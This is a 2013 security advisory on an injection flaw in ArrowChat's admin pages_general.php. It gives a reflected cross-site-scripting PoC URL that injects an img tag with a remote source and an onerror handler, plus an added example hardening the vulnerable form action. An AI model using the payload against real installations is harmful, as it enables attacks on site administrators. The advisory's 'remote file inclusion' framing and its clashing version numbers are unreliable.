ArrowChat 1.5.61 RFI Vulnerability
Source: vfocus.net  Author: Euforia33  Published: 2013-02-22
// RFI Vulnerability in ArrowChat 1.6.1
// RFI PHP Image coded by Euforia33, 21/02/2013.
// Known vulnerable versions (1.6.1 and below) 

In addition to the XSS and LFI vulnerabilities in ArrowChat 1.5.61 as pointed out by
Kallimero (http://packetstormsecurity.com/files/119999/ArrowChat-1.5.61-Cross-Site-Scripting-Local-File-Inclusion.html),
you can also include remote PHP files by exploiting the same piece of code:

<form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>?do=<?php echo $do; ?>" enctype="multipart/form-data">

By using image headers, it is possible to include remote PHP files directly onto the page
through the IMG tags. The onerror attribute is used to show a way to inject XSS without the
need for script tags, which are often filtered out. If you want to use the XSS instead of
the RFI, simply point the img src to a location that does not exist; it will return the
error that we have chosen, which in this case is the XSS injection.

Here's a sample image, rendered in PHP for the purpose of checking if RFI is possible:

<?php
# Strings to display in the image, includes a shuffle for testing functionality of the code
$maintxt  = "RFI Vulnerability Test";
$exetest  = "Packet Storm";
$exetest2 = str_shuffle($exetest);

# 350x120 canvas with a black background and grey text colour
$im  = imagecreatetruecolor(350, 120);
$bg  = imagecolorallocate($im, 0x00, 0x00, 0x00);
$txt = imagecolorallocate($im, 85, 85, 85);
imagefilledrectangle($im, 0, 0, 350, 120, $bg);

# A negative colour index turns antialiasing off; 'Arial.ttf' must resolve to a font file
imagettftext($im, 17, 0, 20, 35, -$txt, 'Arial.ttf', "{$maintxt}");
imagettftext($im, 11, 0, 125, 70, -$txt, 'Arial.ttf', "{$exetest}");
imagettftext($im, 11, 0, 125, 90, -$txt, 'Arial.ttf', "{$exetest2}");

# Sending image header
header('Content-type: image/png');
imagepng($im);
imagedestroy($im);
?>

PoC:

http://[domain.name]/[pathtoArrowChat]/admin/layout/pages_general.php/'"/><img src="http://[remote.domain.name]/Image.php" onerror=alert(33);>

Euforia33.
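
As an added example (not part of the original advisory and not ArrowChat's own code), the PHP below contrasts the unencoded PHP_SELF form action quoted in the advisory with a hardened version of the same tag. The request values, the /arrowchat/ path, the remote.example host and the allowed ?do= values are constructed assumptions.

```php
<?php
// Added example, not ArrowChat code: why echoing PHP_SELF into an HTML
// attribute is injectable, and a hardened way to build the same form action.

// Vulnerable pattern from the advisory: PHP_SELF carries the client-supplied
// PATH_INFO (everything after "pages_general.php/") and is echoed unencoded,
// so a quote in the path closes the action attribute and starts new markup.
function form_action_vulnerable(array $server, string $do): string
{
    return '<form method="post" action="' . $server['PHP_SELF'] . '?do=' . $do
         . '" enctype="multipart/form-data">';
}

// Hardened: SCRIPT_NAME excludes PATH_INFO, $do is checked against an
// allowlist, and every value is encoded for the attribute context.
function form_action_hardened(array $server, string $do, array $allowedDo): string
{
    if (!in_array($do, $allowedDo, true)) {
        $do = $allowedDo[0]; // fall back to a known page
    }
    $action = htmlspecialchars($server['SCRIPT_NAME'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
            . '?do=' . rawurlencode($do);
    return '<form method="post" action="' . $action . '" enctype="multipart/form-data">';
}

// Constructed request values mirroring the shape of the PoC URL above.
$server = [
    'SCRIPT_NAME' => '/arrowchat/admin/layout/pages_general.php',
    'PHP_SELF'    => '/arrowchat/admin/layout/pages_general.php/'
                   . '\'"/><img src="http://remote.example/Image.php" onerror=alert(33);>',
];
$allowedDo = ['general', 'language']; // hypothetical values of the ?do= parameter

// The first line shows the injected <img> tag breaking out of the attribute;
// the second contains only the script path and the allowlisted page name.
echo form_action_vulnerable($server, 'general'), "\n";
echo form_action_hardened($server, 'general', $allowedDo), "\n";
```

Encoding alone (htmlspecialchars on PHP_SELF) would also neutralise the quote breakout, but dropping PATH_INFO entirely keeps client-supplied path data out of the markup.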

 